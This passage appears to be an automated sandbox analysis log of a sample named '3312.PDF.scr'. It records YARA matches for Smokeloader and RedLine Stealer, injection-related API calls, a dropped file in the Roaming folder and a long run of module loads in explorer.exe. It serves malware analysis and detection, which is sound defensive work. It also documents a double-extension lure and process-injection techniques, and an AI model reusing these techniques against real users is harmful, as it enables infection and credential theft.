    Source: 00000000.00000002.1761506014.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1761888720.000000000082D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000005.00000002.2038193053.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1761540822.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.2038289843.000000000060D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000005.00000002.2038416876.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.1761578601.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: initial sampleStatic PE information: Filename: 3312.PDF.scr
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401529
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00402FFA RtlCreateUserThread,NtTerminateProcess,0_2_00402FFA
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401541
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401545
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00402379 NtQuerySystemInformation,0_2_00402379
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_0040237B NtQuerySystemInformation,0_2_0040237B
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401534
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DB
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_004020EA NtQuerySystemInformation,0_2_004020EA
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00402387 NtQuerySystemInformation,0_2_00402387
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00402397 NtQuerySystemInformation,0_2_00402397
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_0040239B NtQuerySystemInformation,0_2_0040239B
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_0040239E NtQuerySystemInformation,0_2_0040239E
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401529
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00402FFA RtlCreateUserThread,NtTerminateProcess,5_2_00402FFA
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401541
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401545
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401553
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00402379 NtQuerySystemInformation,5_2_00402379
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_0040237B NtQuerySystemInformation,5_2_0040237B
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401534
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014DB
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_004020EA NtQuerySystemInformation,5_2_004020EA
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00402387 NtQuerySystemInformation,5_2_00402387
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00402397 NtQuerySystemInformation,5_2_00402397
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_0040239B NtQuerySystemInformation,5_2_0040239B
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_0040239E NtQuerySystemInformation,5_2_0040239E
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_004187300_2_00418730
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_004187305_2_00418730
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 9020
    Source: 3312.PDF.scrStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000005.00000002.2038380670.0000000002160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.1761506014.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1761888720.000000000082D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000005.00000002.2038193053.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1761540822.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.2038289843.000000000060D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000005.00000002.2038416876.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.1761578601.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 3312.PDF.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: djjergw.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: explorer.exe, 0000000A.00000002.2905935716.0000000008B20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
    Source: classification engineClassification label: mal100.troj.evad.winSCR@4/9@8/1
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00830572 CreateToolhelp32Snapshot,Module32First,0_2_00830572
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\djjergwJump to behavior
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
    Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\b70fe613-99ea-4b8e-adac-660fdacd43a9Jump to behavior
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: 3312.PDF.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 3312.PDF.scrVirustotal: Detection: 39%
    Source: unknownProcess created: C:\Users\user\Desktop\3312.PDF.scr "C:\Users\user\Desktop\3312.PDF.scr" /S
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\djjergw C:\Users\user\AppData\Roaming\djjergw
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 9020
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
    Source: C:\Users\user\Desktop\3312.PDF.scrSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
